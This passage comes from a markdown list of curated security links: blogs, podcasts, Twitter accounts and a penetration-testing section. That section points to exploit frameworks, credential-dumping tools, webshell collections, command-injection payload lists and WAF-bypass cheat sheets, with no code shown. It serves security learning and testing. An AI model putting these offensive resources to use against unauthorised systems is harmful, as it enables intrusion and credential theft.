:small_orange_diamond: <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a> - a curated list of awesome web-app firewall (WAF) stuff.<br>
:small_orange_diamond: <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br>
:small_orange_diamond: <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br>
:small_orange_diamond: <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a> - is a small course on exploiting and defending neural networks.<br>
:small_orange_diamond: <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568"><b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br>
:small_orange_diamond: <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29"><b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br>
:small_orange_diamond: <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a> - a curated list of awesome YARA rules, tools, and people.<br>
:small_orange_diamond: <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a> - guide to securing and improving privacy on macOS.<br>
:small_orange_diamond: <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a> - is a collected list of awesome security talks.<br>
:small_orange_diamond: <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a> - list of movies every hacker & cyberpunk must watch.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://www.cheatography.com/"><b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br>
:small_orange_diamond: <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a> - static analysis tools for all programming languages.<br>
:small_orange_diamond: <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a> - path to a free self-taught education in Computer Science.<br>
:small_orange_diamond: <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a> - is a collection of postmortems (config errors, hardware failures, and more).<br>
:small_orange_diamond: <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a> - build your own (insert technology here).<br>
:small_orange_diamond: <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a> - is a curated list of project-based tutorials in C.<br>
:small_orange_diamond: <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a> - various README templates & tips on writing high-quality documentation.<br>
:small_orange_diamond: <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a> - free software that works great, and also happens to be open-source Python.<br>
:small_orange_diamond: <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a> - a topic-centric list of HQ open datasets.<br>
</p>
#### Blogs/Podcasts/Videos [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: SysOps/DevOps
<p>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI"><b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM"><b>A Netflix Guide to Microservices</b></a> - Josh Evans talks about the chaotic and vibrant world of microservices at Netflix.<br>
</p>
##### :black_small_square: Developers
<p>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ"><b>Comparing C to machine language</b></a> - compare a simple C program with the compiled machine code of that program.<br>
</p>
##### :black_small_square: Geeky Persons
<p>
:small_orange_diamond: <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br>
:small_orange_diamond: <a href="https://gynvael.coldwind.pl/"><b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br>
:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/"><b>Michał "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br>
:small_orange_diamond: <a href="https://ma.ttias.be/"><b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br>
:small_orange_diamond: <a href="https://nickcraver.com/"><b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br>
:small_orange_diamond: <a href="https://scotthelme.co.uk/"><b>Scott Helme</b></a> - security researcher, international speaker and founder of securityheaders.com and report-uri.com.<br>
:small_orange_diamond: <a href="https://krebsonsecurity.com/"><b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br>
:small_orange_diamond: <a href="https://www.schneier.com/"><b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br>
:small_orange_diamond: <a href="https://chrissymorgan.co.uk/"><b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br>
:small_orange_diamond: <a href="https://blog.zsec.uk/"><b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br>
:small_orange_diamond: <a href="https://danielmiessler.com/"><b>Daniel Miessler</b></a> - cybersecurity expert and writer.<br>
:small_orange_diamond: <a href="https://samy.pl/"><b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br>
:small_orange_diamond: <a href="https://www.j4vv4d.com/"><b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br>
:small_orange_diamond: <a href="https://www.grahamcluley.com/"><b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br>
:small_orange_diamond: <a href="https://security.szurek.pl/"><b>Kacper Szurek</b></a> - detection engineer at ESET.<br>
:small_orange_diamond: <a href="https://www.troyhunt.com/"><b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br>
:small_orange_diamond: <a href="https://raymii.org/s/index.html"><b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br>
:small_orange_diamond: <a href="https://robert.penz.name/"><b>Robert Penz</b></a> - IT security expert.<br>
</p>
##### :black_small_square: Geeky Blogs
<p>
:small_orange_diamond: <a href="https://linux-audit.com/"><b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br>
:small_orange_diamond: <a href="https://linuxsecurity.expert/"><b>
Linux Security Expert</b></a> - trainings, howtos, checklists, security tools and more.<br>
:small_orange_diamond: <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br>
:small_orange_diamond: <a href="https://www.secjuice.com"><b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br>
:small_orange_diamond: <a href="https://duo.com/decipher"><b>Decipher</b></a> - security news that informs and inspires.<br>
</p>
##### :black_small_square: Geeky Vendor Blogs
<p>
:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br>
:small_orange_diamond: <a href="https://nakedsecurity.sophos.com/"><b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br>
:small_orange_diamond: <a href="https://www.tripwire.com/state-of-security/"><b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current information security issues.<br>
:small_orange_diamond: <a href="https://blog.malwarebytes.com/"><b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br>
:small_orange_diamond: <a href="https://www.trustedsec.com/category/articles/"><b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br>
:small_orange_diamond: <a href="https://portswigger.net/blog"><b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br>
:small_orange_diamond: <a href="https://www.alienvault.com/blogs"><b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br>
:small_orange_diamond: <a href="https://thycotic.com/company/blog/"><b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, data breaches, and more.<br>
</p>
##### :black_small_square: Geeky Cybersecurity Podcasts
<p>
:small_orange_diamond: <a href="https://risky.biz/netcasts/risky-business/"><b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br>
:small_orange_diamond: <a href="https://www.vice.com/en_us/topic/cyber"><b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br>
:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br>
:small_orange_diamond: <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b>
Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br>
:small_orange_diamond: <a href="https://themanyhats.club/tag/episodes/"><b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br>
:small_orange_diamond: <a href="https://darknetdiaries.com/"><b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br>
:small_orange_diamond: <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis"><b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br>
:small_orange_diamond: <a href="https://www.youtube.com/user/SecurityWeeklyTV"><b>Security Weekly</b></a> - the latest information security and hacking news.<br>
</p>
##### :black_small_square: Geeky Cybersecurity Video Blogs
<p>
:small_orange_diamond: <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g"><b>rev3rse security</b></a> - offensive, binary exploitation, web application security, vulnerability, hardening, red team, blue team.<br>
:small_orange_diamond: <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"><b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br>
:small_orange_diamond: <a href="https://www.youtube.com/infoseccynic"><b>J4vv4D</b></a> - the important information regarding our internet security.<br>
:small_orange_diamond: <a href="https://cybertalks.co.uk/"><b>
CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br>
</p>
##### :black_small_square: Best Personal Twitter Accounts
<p>
:small_orange_diamond: <a href="https://twitter.com/blackroomsec"><b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br>
:small_orange_diamond: <a href="https://twitter.com/MarcoCiappelli"><b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br>
:small_orange_diamond: <a href="https://twitter.com/binitamshah"><b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br>
:small_orange_diamond: <a href="https://twitter.com/joe_carson"><b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br>
:small_orange_diamond: <a href="https://twitter.com/mikko"><b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br>
:small_orange_diamond: <a href="https://twitter.com/esrtweet"><b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br>
:small_orange_diamond: <a href="https://twitter.com/gynvael"><b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br>
:small_orange_diamond: <a href="https://twitter.com/x0rz"><b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br>
:small_orange_diamond: <a href="https://twitter.com/hasherezade"><b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br>
:small_orange_diamond: <a href="https://twitter.com/TinkerSec"><b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br>
:small_orange_diamond: <a href="https://twitter.com/alisaesage"><b>@alisaesage</b></a> - independent hacker and researcher.<br>
:small_orange_diamond: <a href="https://twitter.com/SwiftOnSecurity"><b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br>
:small_orange_diamond: <a href="https://twitter.com/dakami"><b>@dakami</b></a> - chief scientist at White Ops, is one of just seven people with the authority to restore the DNS root keys.<br>
:small_orange_diamond: <a href="https://twitter.com/samykamkar"><b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br>
:small_orange_diamond: <a href="https://twitter.com/securityweekly"><b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br>
:small_orange_diamond: <a href="https://twitter.com/jack_daniel"><b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br>
:small_orange_diamond: <a href="https://twitter.com/thegrugq"><b>@thegrugq</b></a> - Security Researcher.<br>
:small_orange_diamond: <a href="https://twitter.com/matthew_d_green"><b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br>
</p>
##### :black_small_square: Best Commercial Twitter Accounts
<p>
:small_orange_diamond: <a href="https://twitter.com/haveibeenpwned"><b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br>
:small_orange_diamond: <a href="https://twitter.com/bugcrowd"><b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br>
:small_orange_diamond: <a href="https://twitter.com/Malwarebytes"><b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br>
:small_orange_diamond: <a href="https://twitter.com/sansforensics"><b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br>
:small_orange_diamond: <a href="https://twitter.com/attcyber"><b>@attcyber</b></a> - AT&T Cybersecurity’s Edge-to-Edge technologies provide threat intelligence, and more.<br>
:small_orange_diamond: <a href="https://twitter.com/TheManyHatsClub"><b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br>
:small_orange_diamond: <a href="https://twitter.com/hedgehogsec"><b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br>
:small_orange_diamond: <a href="https://twitter.com/NCSC"><b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br>
:small_orange_diamond: <a href="https://twitter.com/Synacktiv"><b>@Synacktiv</b></a> - IT security experts.<br>
</p>
##### :black_small_square: A piece of history
<p>
:small_orange_diamond: <a href="http://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other useful techniques.<b>*</b><br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk"><b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br>
</p>
#### Hacking/Penetration Testing [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Pentesters arsenal tools
<p>
:small_orange_diamond: <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br>
:small_orange_diamond: <a href="https://www.metasploit.com/"><b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br>
:small_orange_diamond: <a href="https://portswigger.net/burp"><b>Burp Suite</b></a> - tool for testing web application security, intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project"><b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br>
:small_orange_diamond: <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br>
:small_orange_diamond: <a href="https://mitmproxy.org/"><b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.<br>
:small_orange_diamond: <a href="https://cirt.net/Nikto2"><b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br>
:small_orange_diamond: <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br>
:small_orange_diamond: <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a> - is a full-featured Web Reconnaissance framework written in Python.<br>
:small_orange_diamond: <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a> - is a network reconnaissance tool which performs automated enumeration of services.<br>
:small_orange_diamond: <a href="https://www.faradaysec.com/"><b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a> - incredibly fast crawler designed for OSINT.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a> - most advanced XSS detection suite.<br>
:small_orange_diamond: <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a> - automated pentest framework for offensive security experts.<br>
:small_orange_diamond: <a href="https://github.com/future-architect/vuls"><b>vuls</b></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br>
:small_orange_diamond: <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a> - a tool for domain flyovers.<br>
:small_orange_diamond: <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a> - information gathering tool for a website or IP address.<br>
:small_orange_diamond: <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a> - detect and bypass web application firewalls and protection systems.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a> - CORS misconfiguration scanner.<br>
:small_orange_diamond: <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br>
:small_orange_diamond: <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a> - find web directories without bruteforce.<br>
:small_orange_diamond: <a href="https://www.openwall.com/john/"><b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br>
:small_orange_diamond: <a href="https://hashcat.net/hashcat/"><b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br>
:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a> - a prototype SSH configuration and policy scanner.<br>
:small_orange_diamond: <a href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a> - find open databases - powered by Binaryedge.io<br>
:small_orange_diamond: <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a> - searchable archive from The Exploit Database.<br>
:small_orange_diamond: <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a> - is a command line utility for searching and downloading exploits.<br>
:small_orange_diamond: <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a> - some setup scripts for security research tools.<br>
:small_orange_diamond: <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a> - CTF framework and exploit development library.<br>
:small_orange_diamond: <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br>
:small_orange_diamond: <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a> - is a package of Pentest scripts.<br>
:small_orange_diamond: <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a> - python tools for penetration testers.<br>
:small_orange_diamond: <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a> - dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.<br>
:small_orange_diamond: <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a> - is an unsupervised, coverage-guided kernel fuzzer.<br>
:small_orange_diamond: <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a> - exploit development and reverse engineering with GDB made easy.<br>
:small_orange_diamond: <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a> - Python Exploit Development Assistance for GDB.<br>
:small_orange_diamond: <a href="https://www.hex-rays.com/products/ida/index.shtml"><b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br>
:small_orange_diamond: <a href="https://github.com/radare/radare2"><b>radare2</b></a> - framework for reverse-engineering and analyzing binaries.<br>
:small_orange_diamond: <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a> - exploitation framework for embedded devices.<br>
:small_orange_diamond: <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a> - is a software reverse engineering (SRE) framework.<br>
:small_orange_diamond: <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br>
:small_orange_diamond: <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a> - is a graphical tool for custom wordlist generation.<br>
:small_orange_diamond: <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br>
:small_orange_diamond: <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br>
:small_orange_diamond: <a href="https://github.com/beefproject/beef"><b>beef</b></a> - the browser exploitation framework project.<br>
:small_orange_diamond: <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a> - automated mass exploiter.<br>
:small_orange_diamond: <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br>
:small_orange_diamond: <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br>
:small_orange_diamond: <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br>
:small_orange_diamond: <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br>
:small_orange_diamond: <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br>
</p>
##### :black_small_square: Pentests bookmarks collection
<p>
:small_orange_diamond: <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br>
:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/Practice.html"><b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br>
:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/webapptest.html"><b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br>
:small_orange_diamond: <a href="https://brutelogic.com.br/blog/"><b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br>
:small_orange_diamond: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br>
:small_orange_diamond: <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/"><b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br>
:small_orange_diamond: <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a> - collection of the cheat sheets useful for pentesting.<br>
:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a> - awesome lists for hackers, pentesters and security researchers.<br>
:small_orange_diamond: <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a> - a curated list of awesome hacking tutorials, tools and resources.<br>
:small_orange_diamond: <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a> - collection of hacking/penetration testing resources to make you better.<br>
:small_orange_diamond: <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a> - collection of awesome penetration testing resources, tools and other shiny things.<br>
:small_orange_diamond: <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a> - is a curated list of awesome Hacking Tools.<br>
:small_orange_diamond: <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a> - author hacking and pentesting notes.<br>
:small_orange_diamond: <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a> - official Black Hat arsenal security tools repository.<br>
:small_orange_diamond: <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon"><b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br>
:small_orange_diamond: <a href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a> - includes thousands of cybersecurity-related references and resources.<br>
:small_orange_diamond: <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a> - there are a LOT of pentesting blogs.<br>
:small_orange_diamond: <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br>
:small_orange_diamond: <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br>
:small_orange_diamond: <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a> - notes for beginner network pentesting course.<br>
:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br>
:small_orange_diamond: <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br>
:small_orange_diamond: <a href="https://github.com/foospidy/payloads"><b>payloads</b></a> - git all the Payloads! A collection of web attack payloads.<br>
:small_orange_diamond: <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a> - command injection payload list.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a> - is a collection of Awesome XSS resources.<br>
:small_orange_diamond: <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a> - common php webshells.<br>
:small_orange_diamond: <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/"><b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing engagements.<br>
:small_orange_diamond: <a href="https://cheatsheetseries.owasp.org/"><b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br>
:small_orange_diamond: <a href="https://jeremylong.github.io/DependencyCheck/index.html"><b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls"><b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br>
:small_orange_diamond: <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a> - hacking & penetration testing & red team & cyber security & computer science resources.<br>
:small_orange_diamond: <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a> - is a free online security knowledge library for pentesters/researchers.<br>
:small_orange_diamond: <a href="https://media.defcon.org/"><b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br>
:small_orange_diamond: <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a> - a curated list of awesome malware analysis tools and resources.<br>
:small_orange_diamond: <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/"><b>SQL Injection Cheat Sheet</b></a> - detailed technical information about the many different variants of the SQL Injection.<br>
:small_orange_diamond: <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br>
:small_orange_diamond: <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br>
:small_orange_diamond: <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br>
:small_orange_diamond: <a href="https://gtfobins.github.io/"><b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br>
:small_orange_diamond: <a href="https://guif.re/"><b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br>
:small_orange_diamond: <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br>
:small_orange_diamond: <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br>
:small_orange_diamond: <a href="https://github.com/bl4de/ctf"><b>ctf</b></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br>
:small_orange_diamond: <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a> - collection of CTF Web challenges.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br>
:small_orange_diamond: <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a> - notes on the most common things for an Internal Network Penetration Test.<br>
:small_orange_diamond: <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br>
:small_orange_diamond: <a href="https://github.com/securitum/research"><b>securitum/research</b></a> - various Proof of Concepts of security research performed by Securitum.<br>
:small_orange_diamond: <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a> - is a list of public penetration test reports released by several consulting security groups.<br>
:small_orange_diamond: <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a> - is a comprehensive curated list of available Bug Bounty.<br>
